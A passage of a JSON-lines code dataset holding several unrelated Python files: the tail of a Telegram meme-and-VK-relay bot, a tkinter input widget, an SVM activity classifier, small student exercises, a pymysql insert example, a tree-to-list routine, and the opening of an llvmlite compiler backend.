reply_to_message_id=message.message_id)\n else:\n my_bot.send_photo(message.chat.id, your_file, reply_to_message_id=message.message_id)\n user_action_log(message, \"got that meme:\\n{0}\".format(your_file.name))\n your_file.close()\n\n\n# команда /kek\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/kek', '/kek@algebrach_bot'])\n# открывает соответствующие файл и папку, кидает рандомную строчку из файла, или рандомную картинку или гифку из папки\ndef myKek(message):\n global weather_bold\n global kek_counter\n global kek_bang\n global kek_crunch\n kek_init = True\n\n if message.chat.id == int(data.my_chatID):\n if kek_counter == 0:\n kek_bang = time.time()\n kek_crunch = kek_bang + 60 * 60\n kek_counter += 1\n kek_init = True\n elif (kek_counter >= data.limit_kek) and (time.time() <= kek_crunch):\n kek_init = False\n elif time.time() > kek_crunch:\n kek_counter = -1\n kek_init = True\n print(\"KEK BANG : {0}\\nKEK CRUNCH : {1}\\nKEK COUNT : {2}\\nTIME NOW : {3}\".format(kek_bang, kek_crunch,\n kek_counter, time.time()))\n\n if kek_init:\n if message.chat.id < 0:\n kek_counter += 1\n your_destiny = random.randint(1, 60)\n # если при вызове не повезло, то кикаем из чата\n if your_destiny == 13:\n my_bot.reply_to(message, \"Предупреждал же, что кикну. 
Если не предупреждал, то \")\n                your_img = open(data.dir_location_meme + \"memeSurprise.gif\", \"rb\")\n                my_bot.send_document(message.chat.id, your_img, reply_to_message_id=message.message_id)\n                your_img.close()\n                try:\n                    if int(message.from_user.id) in data.admin_ids:\n                        my_bot.reply_to(message, \"...Но против хозяев не восстану.\")\n                        user_action_log(message, \"can't be kicked out\")\n                    else:\n                        # кикаем кекуна из чата (можно ещё добавить условие, что если один юзер прокекал больше числа n за время t, то тоже в бан)\n                        my_bot.kick_chat_member(message.chat.id, message.from_user.id)\n                        user_action_log(message, \"has been kicked out\")\n                        my_bot.unban_chat_member(message.chat.id, message.from_user.id)\n                        # тут же снимаем бан, чтобы смог по ссылке к нам вернуться\n                        user_action_log(message, \"has been unbanned\")\n                except Exception as ex:\n                    logging.exception(ex)\n                    pass\n            else:\n                type_of_KEK = random.randint(1, 33)\n                # 1/33 шанс на картинку или гифку\n                if type_of_KEK == 9:\n                    all_imgs = os.listdir(data.dir_location_kek)\n                    rand_file = random.choice(all_imgs)\n                    your_file = open(data.dir_location_kek + rand_file, \"rb\")\n                    if rand_file.endswith(\".gif\"):\n                        my_bot.send_document(message.chat.id, your_file, reply_to_message_id=message.message_id)\n                    else:\n                        my_bot.send_photo(message.chat.id, your_file, reply_to_message_id=message.message_id)\n                    your_file.close()\n                    user_action_log(message, \"got that kek:\\n{0}\".format(your_file.name))\n                # иначе смотрим файл\n                else:\n                    file_KEK = open(data.file_location_kek, 'r')\n                    your_KEK = random.choice(file_KEK.readlines())\n                    if str(your_KEK) == str(\"Чекни /weather.\\n\"):\n                        weather_bold = True\n                    else:\n                        weather_bold = False\n                    # если попалась строчка вида '<sticker>ID', то шлём стикер по ID\n                    if str(your_KEK).startswith(\"<sticker>\"):\n                        if not str(your_KEK).endswith(\"\\n\"):\n                            sticker_id = str(your_KEK[9:])\n                        else:\n                            sticker_id = str(your_KEK[9:-1])\n                        my_bot.send_sticker(message.chat.id, sticker_id, reply_to_message_id=message.message_id)\n                    # иначе просто шлём обычный текст\n                    else:\n                        my_bot.reply_to(message, str(your_KEK).replace(\"<br>\", \"\\n\"))\n                    file_KEK.close()\n                    user_action_log(message, \"got that kek:\\n{0}\".format(str(your_KEK).replace(\"
\", \"\\n\")))\n if kek_counter == data.limit_kek - 10:\n time_remaining = divmod(int(kek_crunch) - int(time.time()), 60)\n my_bot.reply_to(message,\n \"Внимание!\\nЭтот чат может покекать ещё не более {0} раз до истечения кекочаса (через {1} мин. {2} сек.).\\nПо истечению кекочаса счётчик благополучно сбросится.\".format(\n data.limit_kek - kek_counter, time_remaining[0], time_remaining[1]), parse_mode=\"HTML\")\n if kek_counter == data.limit_kek:\n time_remaining = divmod(int(kek_crunch) - int(time.time()), 60)\n my_bot.reply_to(message, \"EL-FIN!\\nТеперь вы сможете кекать только через {0} мин. {1} сек.\".format(\n time_remaining[0], time_remaining[1]), parse_mode=\"HTML\")\n kek_counter += 1\n else:\n print(\"{0}\\nLimit of keks has been expired.\\nWait until {1} to kek again.\\n\".format(\n time.strftime(data.time, time.gmtime()), kek_crunch))\n\n\n# для читерства\n\n@my_bot.message_handler(commands=['prize'])\ndef showPrizes(message):\n if not len(message.text.split()) == 1 and int(message.from_user.id in data.admin_ids):\n codeword = message.text.split()[1]\n if codeword == data.my_prize:\n all_imgs = os.listdir(data.dir_location_prize)\n rand_file = random.choice(all_imgs)\n your_file = open(data.dir_location_prize + rand_file, \"rb\")\n if rand_file.endswith(\".gif\"):\n my_bot.send_document(message.chat.id, your_file, reply_to_message_id=message.message_id)\n else:\n my_bot.send_photo(message.chat.id, your_file, reply_to_message_id=message.message_id)\n user_action_log(message, \"knows the secret and got that prize:\\n{0}\\n\".format(your_file.name))\n your_file.close()\n elif not int(message.from_user.id in data.admin_ids):\n user_action_log(message, \"tried to access the prizes, but he's not in Admin list\")\n\n\n@my_bot.message_handler(commands=['dn'])\n# рандомно выбирает элементы из списка значков\n# TODO: желательно найти способ их увеличить или заменить на ASCII арт\ndef myDN(message):\n roll_sum = 0\n symbols = ''\n if len(message.text.split()) == 3:\n try:\n dice_max = int(message.text.split()[1])\n dice_n = int(message.text.split()[2])\n except ValueError:\n return\n max_result = dice_n * dice_max\n for count in range(dice_n):\n roll = random.randint(0, dice_max)\n roll_sum += roll\n if count < dice_n - 1:\n symbols += '{0} + '.format(roll)\n elif count == dice_n - 1:\n symbols += '{0} = {1} ({2})'.format(roll, roll_sum, max_result)\n if not len(symbols) > 4096:\n my_bot.reply_to(message, symbols)\n user_action_log(message, \"knew about /dn and got that output: {0}\".format(symbols))\n else:\n my_bot.reply_to(message, \"Слишком большие числа. Попробуй что-нибудь поменьше\")\n user_action_log(message, \"knew about /dn and the answer was too long to fit one message\")\n\n\n@my_bot.message_handler(commands=['kill'])\ndef killBot(message):\n if not len(message.text.split()) == 1 and int(message.from_user.id in data.admin_ids):\n codeword = message.text.split()[1]\n if codeword == data.my_killswitch:\n my_bot.reply_to(message, \"Прощай, жестокий чат. 
;~;\")\n # создаём отдельный алёрт для .sh скрипта — перезапустим бот сами\n try:\n file_killed_write = open(data.bot_killed_filename, 'w')\n file_killed_write.close()\n print(\n \"{0}\\nBot has been killed off remotely by user {1}.\\nPlease, change the killswitch keyword in data.py before running the bot again.\".format(\n time.strftime(data.time, time.gmtime()), message.from_user.first_name))\n sys.exit()\n except RuntimeError:\n sys.exit()\n elif not int(message.from_user.id in data.admin_ids):\n user_action_log(message, \"tried to kill the bot. Fortunately, he's not in Admin list\")\n\n\n# проверяет наличие новых постов ВК в паблике Мехмата и кидает их при наличии\ndef vkListener(interval):\n while tokens.vk != \"\":\n try:\n # коннектимся к API через requests. Берём первые два поста\n response = requests.get('https://api.vk.com/method/wall.get',\n params={'access_token': tokens.vk, 'owner_id': data.vkgroup_id, 'count': 2,\n 'offset': 0})\n # создаём json-объект для работы\n posts = response.json()['response']\n # инициализируем строку, чтобы он весь текст кидал одним сообщением\n vk_final_post = ''\n vk_initiate = False\n show_preview = False\n # пытаемся открыть файл с датой последнего поста\n try:\n file_lastdate_read = open(data.vk_update_filename, 'r')\n last_recorded_postdate = file_lastdate_read.read()\n file_lastdate_read.close()\n except IOError:\n last_recorded_postdate = -1\n pass\n try:\n int(last_recorded_postdate)\n except ValueError:\n last_recorded_postdate = -1\n pass\n # смотрим, запиннен ли первый пост\n if 'is_pinned' in posts[-2]:\n is_post_pinned = posts[-2]['is_pinned']\n else:\n is_post_pinned = 0\n # если да, то смотрим, что свежее — запинненный пост или следующий за ним\n if is_post_pinned == 1:\n date_pinned = int(posts[-2]['date'])\n date_notpinned = int(posts[-1]['date'])\n if date_pinned >= date_notpinned:\n post = posts[-2]\n else:\n post = posts[-1]\n post_date = max(date_pinned, date_notpinned)\n # если нет, то берём первый пост\n else:\n post = posts[-2]\n post_date = int(posts[-2]['date'])\n # наконец, сверяем дату свежего поста с датой, сохранённой в файле\n if post_date > int(last_recorded_postdate):\n vk_initiate = True\n else:\n vk_initiate = False\n # если в итоге полученный пост — новый, то начинаем операцию\n if vk_initiate:\n post_recent_date = post_date\n print(\n \"{0}\\nWe have new post in Mechmath's VK public.\\n\".format(time.strftime(data.time, time.gmtime())))\n # если это репост, то сначала берём сообщение самого мехматовского поста\n if ('copy_text' in post) or ('copy_owner_id' in post):\n if 'copy_text' in post:\n post_text = post['copy_text']\n vk_final_post += post_text.replace(\"
\", \"\\n\")\n # пробуем сформулировать откуда репост\n if 'copy_owner_id' in post:\n original_poster_id = post['copy_owner_id']\n # если значение ключа 'copy_owner_id' отрицательное, то перед нами репост из группы\n if int(original_poster_id) < 0:\n response_OP = requests.get('https://api.vk.com/method/groups.getById',\n params={'group_ids': -(int(original_poster_id))})\n name_OP = response_OP.json()['response'][0]['name']\n screenname_OP = response_OP.json()['response'][0]['screen_name']\n # добавляем строку, что это репост из такой-то группы\n vk_final_post += \"\\n\\nРепост из группы {1}:\\n\".format(\n screenname_OP, name_OP)\n # если значение ключа 'copy_owner_id' положительное, то репост пользователя\n else:\n response_OP = requests.get('https://api.vk.com/method/users.get',\n params={'access_token': tokens.vk,\n 'user_id': int(original_poster_id)})\n name_OP = \"{0} {1}\".format(response_OP.json()['response'][0]['first_name'],\n response_OP.json()['response'][0]['last_name'], )\n screenname_OP = response_OP.json()['response'][0]['uid']\n # добавляем строку, что это репост такого-то пользователя\n vk_final_post += \"\\n\\nРепост от пользователя {1}:\\n\".format(\n screenname_OP, name_OP)\n else:\n print(\"What.\")\n try:\n # добавляем сам текст репоста\n post_text = post['text']\n vk_final_post += post_text.replace(\"
\", \"\\n\")\n vk_final_post += \"\\n\"\n except KeyError:\n pass\n # смотрим на наличие ссылок, если есть — добавляем\n try:\n for i in range(0, len(post['attachments'])):\n if 'link' in post['attachments'][i]:\n post_link = post['attachments'][i]['link']['url']\n vk_final_post += post_link\n vk_final_post += \"\\n\"\n print(\"Successfully extracted link URL:\\n{0}\\n\".format(post_link))\n except KeyError:\n pass\n # если есть вики-ссылки на профили пользователей ВК вида '[screenname|real name]', то превращаем ссылки в кликабельные\n try:\n pattern = re.compile(r\"\\[([^\\|]+)\\|([^\\|]+)\\]\", re.U)\n results = pattern.findall(vk_final_post.decode('utf-8'), re.U)\n for i in range(0, len(results)):\n screen_name_user = results[i][0].encode('utf-8')\n real_name_user = results[i][1].encode('utf-8')\n link = \"{1}\".format(screen_name_user, real_name_user)\n unedited = \"[{0}|{1}]\".format(screen_name_user, real_name_user)\n vk_final_post = vk_final_post.replace(unedited, link)\n except Exception as ex:\n logging.exception(ex)\n # смотрим на наличие картинок\n try:\n img_src = []\n for i in range(0, len(post['attachments'])):\n # если есть, то смотрим на доступные размеры. Для каждой картинки пытаемся выудить ссылку на самое большое расширение, какое доступно\n if 'photo' in post['attachments'][i]:\n we_got_src = False\n if 'src_xxbig' in post['attachments'][i]['photo']:\n post_attach_src = post['attachments'][i]['photo']['src_xxbig']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n elif ('src_xbig' in post['attachments'][i]['photo']) and (not we_got_src):\n post_attach_src = post['attachments'][i]['photo']['src_big']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n elif ('src_big' in post['attachments'][i]['photo']) and (not we_got_src):\n post_attach_src = post['attachments'][i]['photo']['src_big']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n elif not we_got_src:\n post_attach_src = post['attachments'][i]['photo']['src']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n else:\n print(\"Couldn't extract photo URL from a VK post.\\n\")\n except KeyError:\n pass\n # отправляем нашу строчку текста\n # если в тексте есть ссылка, а по ссылке есть какая-нибудь картинка,\n # то прикрепляем ссылку к сообщению (делаем превью)\n try:\n if 'image_src' in post['attachment']['link']:\n show_preview = True\n except KeyError:\n show_preview = False\n pass\n if show_preview:\n my_bot.send_message(data.my_chatID, vk_final_post.replace(\"
\", \"\\n\"), parse_mode=\"HTML\")\n # если нет — отправляем без прикреплённой ссылки\n else:\n my_bot.send_message(data.my_chatID, vk_final_post.replace(\"
\", \"\\n\"), parse_mode=\"HTML\",\n disable_web_page_preview=True)\n # отправляем все картинки, какие нашли\n for i in range(0, len(img_src)):\n my_bot.send_photo(data.my_chatID, img_src[i])\n # записываем дату поста в файл, чтобы потом сравнивать новые посты\n file_lastdate_write = open(data.vk_update_filename, 'w')\n file_lastdate_write.write(str(post_recent_date))\n file_lastdate_write.close()\n vk_initiate = False\n # 5 секунд нужно для инициализации файла\n time.sleep(5)\n time.sleep(interval)\n # из-за Telegram API иногда какой-нибудь пакет не доходит\n except ReadTimeout as ex:\n # logging.exception(e)\n print(\n \"{0}\\nRead Timeout in vkListener() function. Because of Telegram API.\\nWe are offline. Reconnecting in 5 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(5)\n # если пропало соединение, то пытаемся снова через минуту\n except ConnectionError as ex:\n # logging.exception(e)\n print(\n \"{0}\\nConnection Error in vkListener() function.\\nWe are offline. Reconnecting in 60 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(60)\n # если Python сдурит и пойдёт в бесконечную рекурсию (не особо спасает)\n except RuntimeError as ex:\n # logging.exception(e)\n print(\"{0}\\nRuntime Error in vkListener() function.\\nRetrying in 3 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(3)\n # если что-то неизвестное — от греха вырубаем с корнем. Создаём алёрт файл для .sh скрипта\n except Exception as ex:\n print(\"{0}\\nUnknown Exception in vkListener() function:\\n{1}\\n{2}\\n\\nCreating the alert file.\\n\".format(\n time.strftime(data.time, time.gmtime()), ex.message, ex.args))\n alert_file_down_write = open(data.bot_down_filename, 'w')\n alert_file_down_write.close()\n print(\"{0}\\nShutting down.\".format(time.strftime(data.time, time.gmtime())))\n os._exit(-1)\n\n\nwhile __name__ == '__main__':\n try:\n # если бот запущен .sh скриптом после падения — удаляем алёрт-файл\n try:\n os.remove(data.bot_down_filename)\n except OSError:\n pass\n # если бот запущен после вырубания нами — удаляем алёрт-файл\n try:\n os.remove(data.bot_killed_filename)\n except OSError:\n pass\n interval = data.vk_interval\n # задаём новый поток для отслеживания постов в ВК, чтобы можно было одновременно работать с ботом\n t = threading.Thread(target=vkListener, args=(interval,))\n t.daemon = True\n t.start()\n bot_update = my_bot.get_updates()\n my_bot.polling(none_stop=True, interval=1)\n time.sleep(1)\n # из-за Telegram API иногда какой-нибудь пакет не доходит\n except ReadTimeout as e:\n # logging.exception(e)\n print(\"{0}\\nRead Timeout. Because of Telegram API.\\nWe are offline. Reconnecting in 5 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(5)\n # если пропало соединение, то пытаемся снова через минуту\n except ConnectionError as e:\n # logging.exception(e)\n print(\"{0}\\nConnection Error.\\nWe are offline. Reconnecting in 60 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(60)\n # если Python сдурит и пойдёт в бесконечную рекурсию (не особо спасает)\n except RuntimeError as e:\n # logging.exception(e)\n print(\"{0}\\nRuntime Error.\\nRetrying in 3 seconds.\\n\".format(time.strftime(data.time, time.gmtime())))\n time.sleep(3)\n # кто-то обратился к боту на кириллице\n except UnicodeEncodeError as e:\n # logging.exception(e)\n print(\"{0}\\nUnicode Encode Error. 
Someone typed in cyrillic.\\nRetrying in 3 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(3)\n # завершение работы из консоли стандартным Ctrl-C\n except KeyboardInterrupt as e:\n # logging.exception(e)\n print(\"\\n{0}\\nKeyboard Interrupt. Good bye.\\n\".format(time.strftime(data.time, time.gmtime())))\n sys.exit()\n # если что-то неизвестное — от греха вырубаем с корнем. Создаём алёрт файл для .sh скрипта\n except Exception as e:\n print(\"{0}\\nUnknown Exception:\\n{1}\\n{2}\\n\\nCreating the alert file.\\n\".format(\n time.strftime(data.time, time.gmtime()), e.message, e.args))\n file_down_write = open(data.bot_down_filename, 'w')\n file_down_write.close()\n print(\"{0}\\nShutting down.\".format(time.strftime(data.time, time.gmtime())))\n os._exit(-1)\n","sub_path":"mm-randbot.py","file_name":"mm-randbot.py","file_ext":"py","file_size_in_byte":46449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209299129","text":"try:\n from Tkinter import *\nexcept:\n from tkinter import *\n\ndef denHex(x):\n # Converts a denary integer into a formatted hexadecimal string\n l = hex(x)[2:].upper()\n if len(l) == 1:\n l = \"0\" + l\n return l\nclass InBar:\n def __init__(self, master, r, c):\n self.master = master\n self.frame = Frame(master,borderwidth=5,relief=\"groove\", bg = \"white\")\n self.frame.grid(row=r, column=c, sticky = W)\n self.fontSize = 12\n self.font = (\"Consolas\",self.fontSize)\n self.label = Label(self.frame,text=\"Input: \",font=self.font,width=8, bg = \"white\")\n self.label.grid(row=0, column=0)\n self.strVar = StringVar()\n self.entry = Entry(self.frame,textvariable=self.strVar,width=10,justify=LEFT, font = self.font,state = \"disabled\", bg =\"white\")\n self.entry.grid(row=0, column=1)\n self.running = False\n #self.enterButton = Button(self.frame,text=\"Enter\",font=self.font,width=7,command=self.enterInput)\n #self.enterButton.grid(row=0,column=2)\n\n def setInState(self, state):\n self.running = state\n pass\n\n\n def trigger(self, args):\n self.args = args\n self.entry[\"state\"] = \"normal\"\n self.label[\"bg\"] = \"orange\"\n self.enterButton = Button(self.frame,text=\"Enter\",font=self.font,width=7,command=self.enterInput)\n self.enterButton.grid(row=0,column=2)\n\n\n\n def enterInput(self):\n char = self.strVar.get()\n self.args[\"ACC\"] = denHex(ord(char))\n self.args[\"inFlag\"] = False\n self.enterButton.destroy()\n self.entry[\"state\"] = \"disabled\"\n self.label[\"bg\"] = \"white\"\n self.strVar.set(\"\")\n self.execute(self.running)\n\n\n\n def execute(self,f):\n pass\n\n\n\n\n\nif __name__ == \"__main__\":\n root = Tk()\n inBar = InBar(root,0,0)\n","sub_path":"CIE_Assembler/src/inBar.py","file_name":"inBar.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612522989","text":"from sklearn import svm\r\nfrom sklearn.model_selection import cross_val_score\r\nimport numpy as np\r\n\r\n\r\nd00 = np.genfromtxt('sleeping_features.csv',delimiter=',')\r\nd01 = np.genfromtxt('sitting_features.csv',delimiter=',')\r\nd02 = np.genfromtxt('standing_features.csv',delimiter=',')\r\nd03 = np.genfromtxt('walking_features.csv',delimiter=',')\r\n\r\n\r\nn00 = d00.shape[0]\r\nn01 = d01.shape[0]\r\nn02 = d02.shape[0]\r\nn03 = d03.shape[0]\r\n\r\nprint(n00)\r\nprint(n01)\r\nprint(n02)\r\nprint(n03)\r\n\r\nt00 = np.zeros(n00) + 1\r\nt01 = np.zeros(n01) + 2\r\nt02 = np.zeros(n02) + 3\r\nt03 = 
np.zeros(n03) + 4\r\n\r\n\r\nd10 = np.vstack((d00,d01))\r\nd10 = np.vstack((d10,d02))\r\nd10 = np.vstack((d10,d03))\r\n\r\nprint(d10)\r\nprint(d10.shape)\r\n\r\nt10 = np.concatenate((t00,t01))\r\nt10 = np.concatenate((t10,t02))\r\nt10 = np.concatenate((t10,t03))\r\n\r\nprint(t10)\r\nprint(t10.shape)\r\n\r\nfrom sklearn.utils import shuffle\r\nd11, t11 = shuffle(d10, t10, random_state=0)\r\n\r\nprint(d11,t11)\r\n\r\nclf = svm.SVC()\r\nprint(clf)\r\nscores = cross_val_score(clf, d11, t11, cv=10)\r\nprint(scores)\r\nprint(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\r\n\r\n\r\ndt01 = np.genfromtxt('sitting_short_features.csv', delimiter=',')\r\ndt02 = np.genfromtxt('standing_short_features.csv', delimiter=',')\r\ndt03 = np.genfromtxt('sleep_short_features.csv', delimiter=',')\r\ndt04 = np.genfromtxt('walking_short_features.csv', delimiter=',')\r\n\r\nclf2 = svm.SVC()\r\nprint(clf2)\r\nclf2.fit(d11,t11)\r\nzz01 = clf2.predict(dt01)\r\nnzz01 = zz01.shape[0]\r\n#print(zz01)\r\nac01 = (zz01 == 2.).sum()\r\nprint(ac01, nzz01)\r\nprint(\"sitting data error: \", ((nzz01-ac01)/nzz01)*100)\r\n\r\nzz02 = clf2.predict(dt02)\r\nnzz02 = zz02.shape[0]\r\n#print(zz02)\r\nac02 = (zz02 == 3.).sum()\r\nprint(ac02, nzz02)\r\nprint(\"standing data error: \", ((nzz02-ac02)/nzz02)*100)\r\n\r\nzz03 = clf2.predict(dt03)\r\nnzz03 = zz03.shape[0]\r\n#print(zz03)\r\nac03 = (zz03 == 1.).sum()\r\nprint(ac03, nzz03)\r\nprint(\"sleeping data error: \", ((nzz03-ac03)/nzz03)*100)\r\n\r\nzz04 = clf2.predict(dt04)\r\nnzz04 = zz04.shape[0]\r\n#print(zz04)\r\nac04 = (zz04 == 4.).sum()\r\nprint(ac04, nzz04)\r\nprint(\"walking data error: \", ((nzz04-ac04)/nzz04)*100)\r\n","sub_path":"Assignment08/Classifier/svm_7_0.py","file_name":"svm_7_0.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227843325","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0014_hero_directo'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='hero',\n name='directo',\n field=models.CharField(max_length=100, verbose_name=b'codigo hangout', blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"blog/migrations/0015_auto_20150531_2123.py","file_name":"0015_auto_20150531_2123.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374533343","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProgram name: Lab 2\nStudent name: Zeyu Li\nStudent number: 109 934 158\nDate: Sep 17, 2018\nCourse code: PRG469NAAL\n\"\"\"\n# Question #1\nfrom copy import copy \ndef pascalsTriangle(row):\n nums = [1]\n for i in range(int(row)):\n print(*nums)\n nums.append(1)\n temp = copy(nums)\n for d in range(i):\n nums[d + 1] = temp[d] + nums[d + 1]\n \nrow = input(\"Please enter the rows of the Pascal's Triangle: \")\npascalsTriangle(row)\n\n# Question #2\ndef alphaFrequency(string):\n count = 0\n string = string.lower()\n for i in range(26):\n for j in range(len(string)):\n if(string[j] == chr(i+97)):\n count += 1\n while(count != 0):\n print(chr(i+97) + \"=\" + str(count) + \" \" + \"*\"* count)\n count = 0\n \nstring = input(\"Please enter a string: \")\nalphaFrequency(string)\n\n# Question #3\nimport random\ndef ran49():\n numbers = [random.randint(1, 49)]\n while(len(numbers) < 6):\n newNum = random.randint(1, 
49)\n if newNum not in numbers:\n numbers.append(newNum)\n numbers = sorted(numbers, key=int)\n print(*numbers)\n \nsets = input(\"Please enter the number of sets you want to generate: \")\nfor i in range(int(sets)):\n ran49()","sub_path":"Labs/Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"24246870","text":"\"\"\"\n数据库写操作\n\"\"\"\nimport pymysql\n# 连接数据库\ndb = pymysql.connect(host='127.0.0.1',\n port=3306,\n user='root',\n password = '123456',\n database = 'stu',\n charset = 'utf8')\n# 生成游标\ncur =db.cursor()\n# 写数据库操作\n# name = input(\"请输入姓名:\")\n# sex = input(\"请输入性别(w/m):\")\n# age = input(\"请输入年龄:\")\n# score = input(\"请输入成绩:\")\n# try:\n# # sql='insert into cls (name,sex,age,score)\n# # values (\"%s\",\"%s\",%s,%s);'%(name,sex,age,score)\n# # 方法2\n# sql = 'insert into cls (name,sex,age,score) values (%s,%s,%s,%s);'\n# cur.execute(sql,[name,sex,age,score]) # 执行sql语句 (不能给sql语句传递关键字,表名,字段名,符号)\n# db.commit() # 将写操作结果提交到数据库\n# except Exception as e:\n# print(e)\n# db.rollback() # 一旦出错则回滚 到 ���句执行之前的状态\nstudent = [\n (\"sfr\",\"w\",16,81),\n (\"sfj\",\"w\",17,80),\n (\"sfl\",\"m\",18,79)\n]\ntry:\n # for i in student:\n # sql = 'insert into cls (name,sex,age,score) values (%s,%s,%s,%s);'\n # cur.execute(sql,i)\n sql = 'insert into cls (name,sex,age,score) values (%s,%s,%s,%s);'\n cur.executemany(sql,student) # 执行sql语句 (不能给sql语句传递关键字,表名,字段名,符号)\n db.commit() # 将写操作结果提交到数据库\nexcept Exception as e:\n print(e)\n db.rollback()\n\n\n# 使用完毕\ncur.close()\ndb.close()","sub_path":"dir/exercise01.py","file_name":"exercise01.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"544798345","text":"prev = None\r\nclass BinaryTree:\r\n def __init__(self,data):\r\n self.data = data\r\n self.left = None\r\n self.right = None\r\n\r\ndef printList(node):\r\n curr = node\r\n while(curr):\r\n print(curr.data)\r\n curr = curr.right\r\n\r\ndef BT2DLL(root):\r\n head = [0]\r\n BT2DLLHelper(root,head)\r\n return head[0]\r\n\r\ndef BT2DLLHelper(root,head):\r\n global prev # making a variable global inside the scope of a function makes the variable static\r\n if root is None:\r\n return\r\n\r\n BT2DLLHelper(root.left,head)\r\n if prev is None:\r\n head[0] = root\r\n\r\n else:\r\n root.left = prev\r\n prev.right = root\r\n prev = root\r\n\r\n BT2DLLHelper(root.right,head)\r\n\r\nroot = BinaryTree(12)\r\nroot.left = BinaryTree(7)\r\nroot.left.left = BinaryTree(2)\r\nroot.left.right = BinaryTree(8)\r\nroot.right = BinaryTree(24)\r\nhead1 = BT2DLL(root)\r\nprintList(head1)\r\n\r\n# printList(head1)\r\n","sub_path":"Trees/BT to Doubly LL.py","file_name":"BT to Doubly LL.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271539881","text":"from llvmlite import ir\nfrom random import randint\nimport llvmlite.binding as llvm\nfrom ctypes import *\nfrom ctypes import CFUNCTYPE, c_double, c_int32\nfrom symbol_table import SymTab\nfrom CompilerError import *\n\n\ntype_t = {\n \"INTEGER\": ir.IntType(32),\n \"REAL\": ir.DoubleType(),\n \"CHAR\": ir.IntType(8),\n \"BOOLEAN\": ir.IntType(1),\n}\n\nir_type_t = {\n \"INTEGER\": ir.IntType(32)(0).type,\n \"REAL\": ir.DoubleType()(0).type,\n \"CHAR\": ir.IntType(8)(0).type,\n \"BOOLEAN\": ir.IntType(1)(0).type,\n}\n\n\nclass Codegen:\n def __init__(self, root, 
debug=False):\n self.root = root\n self.debug = debug\n self.symbol_table = SymTab()\n self.module = ir.Module(root.children[0].children[1].name)\n self.caselist = []\n self.default = None\n\n def codegen(self):\n self._codegen(self.root)\n llvm_ir = self.module.__repr__()\n llvm.initialize()\n llvm.initialize_native_target()\n llvm.initialize_native_asmprinter()\n self.mod = llvm.parse_assembly(llvm_ir)\n # mod.verify()\n target = llvm.Target.from_default_triple()\n target_machine = target.create_target_machine()\n asm = target_machine.emit_assembly(self.mod)\n return asm\n\n def irshow(self):\n self._codegen(self.root)\n return self.module\n\n\n def crun(self, func, args, ctype=c_int32):\n target = llvm.Target.from_default_triple()\n target_machine = target.create_target_machine()\n # And an execution engine with an empty backing module\n backing_mod = llvm.parse_assembly(\"\")\n engine = llvm.create_mcjit_compiler(backing_mod, target_machine)\n engine.add_module(self.mod)\n engine.finalize_object()\n engine.run_static_constructors()\n func_ptr = engine.get_function_address(func)\n cfunc = CFUNCTYPE(ctype)(func_ptr)\n\n res = cfunc(*args)\n\n return res\n\n def _codegen(self, node):\n method = node.type\n return getattr(self, method)(node)\n\n\n def info(self, node):\n print(\"Debug: Node { %s, %s, %s}\" % (node.type, node.name, node.children))\n\n def program(self, node):\n self.symbol_table.create_tab()\n self.main_type = ir.FunctionType(ir.VoidType(), ())\n self.main_func = ir.Function(self.module, self.main_type, name=node.children[0].children[1].name)\n self.block = self.main_func.append_basic_block('main')\n self.builder = ir.IRBuilder(self.block)\n self._codegen(node.children[1])\n self.builder.ret_void()\n # print(self.module)\n\n def routine(self, node):\n for n in node.children:\n self._codegen(n)\n\n def subroutine(self, node):\n for n in node.children:\n self._codegen(n)\n\n def routine_head(self, node):\n for n in node.children:\n self._codegen(n)\n\n def label_part(self, node):\n pass\n\n def const_part(self, node):\n if len(node.children) < 2:\n return\n else:\n self._codegen(node.children[1])\n\n def const_expr_list(self, node):\n paralist = node.children[-4:]\n name = paralist[0].name\n const_v = self._codegen(paralist[2])\n # addr = self.builder.alloca(const_v.type)\n # self.builder.store(const_v, addr)\n # self.symbol_table.insert([name, 